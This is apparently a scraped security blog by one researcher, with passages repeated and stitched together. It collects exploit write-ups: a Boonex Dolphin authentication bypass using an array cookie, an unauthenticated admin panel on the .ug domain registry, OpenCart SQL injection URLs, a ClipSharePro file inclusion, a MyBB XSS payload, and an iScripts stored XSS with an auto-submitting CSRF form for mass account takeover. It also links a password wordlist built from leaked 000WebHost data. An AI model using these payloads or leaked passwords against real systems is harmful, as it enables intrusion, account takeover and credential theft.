# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is equal to Cookie parameter memberpassword
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
This will allow the attacker to bypass the authentication and can also enter in admin panel.
#Independent Pakistani Security Researcher
Hi, after a
long time... today I am going to show you POC for pwning TLD .ug which I did
some 3-4 years back.
Years back the
interface of the domain was http://old.registry.co.ug/ and "Domain Manager
Panel" sub-domain was not exposed in the TLD main domain and search
engines.
So, after doing
some information gathering e.g. port scanning, whois lookup's etc I found the
Domain panel which was located at https://new.registry.co.ug:8006/
I am not going
in detailed explanation of how I do the pentest rather show you the main
weakness "Direct object reference".
So, after
trying hard for RCE, SQLi, server vulnerabilities enumeration etc. I found a
direct object reference to the admin panel.
To enter in the
domain manager as admin you just have to locate below URL:
https://new.registry.co.ug:8006/admin
There was no
validation of users via sessions or any other mechanism. And I was able to see
all the stuff in admin panel including changing DNS of any domain such as google,
MSN etc.
At that time I
tried to contact them but I didn’t get any response and later in 2013 and 2015
someone hacked and changed the DNS of some domains like google.co.ug, MSN etc.
When I came to know the defacement I recheck for the vulnerability but this
time it was patch by them (after the defacement). But still it is vuln to
direct object reference in many other places.
Will come up
with some more cool Hack Diaries - Happy Hacking ;)
Hi, I have just extracted passwords from leaked 000WebHost data and made a wordlist for hash cracking :).
You can find it here
https://drive.google.com/open?id=0B_ysNAZFtakdRlg5N0pvV01jSGs
You can find it here
https://drive.google.com/open?id=0B_ysNAZFtakdRlg5N0pvV01jSGs
Hi , so today we have SQL injection in OpenCart .
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..
http://www.exploit-db.com/exploits/32520
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
#Independent Pakistani Security Researcher
Hi , so today we have SQL injection in OpenCart .
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
http://cxsecurity.com/issue/WLB-2014030063
# Exploit Title : ClipSharePro <= 4.1 Local File Inclusion
# Date : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Local File Inclusion
ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through
which attacker can include arbitrary file in webapp.
LFI in ubr_link_upload.php
Poc code
if($MULTI_CONFIGS_ENABLED){
if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
}
else{ $config_file = $DEFAULT_CONFIG; }
// Load config file
require $config_file; //including arbitrary file $_GET['config_file']
echo $config_file;
Hi , i didn't update the blog for some time as i was busy with some other stuff but now onward some cool stuff coming soon which i found but didn't publish them..
Mybb XSS , some days back i found a advisory XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/
After reading the article and little reviewing the code i found same types of function were coded for searching private messages.
So i fuzz the same inputs strings which was used by author in search.php and got private.php also vuln to XSS.
function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php
private.php
POST paramter keywords
Data:<script>alert(/Saadi/)</script>qor'("\2a</script>
P0c
Mybb XSS , some days back i found a advisory XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/
After reading the article and little reviewing the code i found same types of function were coded for searching private messages.
So i fuzz the same inputs strings which was used by author in search.php and got private.php also vuln to XSS.
function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php
private.php
POST paramter keywords
Data:<script>alert(/Saadi/)</script>qor'("\2a</script>
P0c
Moreover Mybb 1.8 alpha is also vuln on private.php..
So this is for today ;)
#Independent Pakistani Security Researcher
# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/profile.php" method=post >
<input type=hidden size=30 maxlength=30 name=userid value="5">
<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
<input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
<input type=submit name=btnSaveChanges class=button value='Save'>
</form>
</html>
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher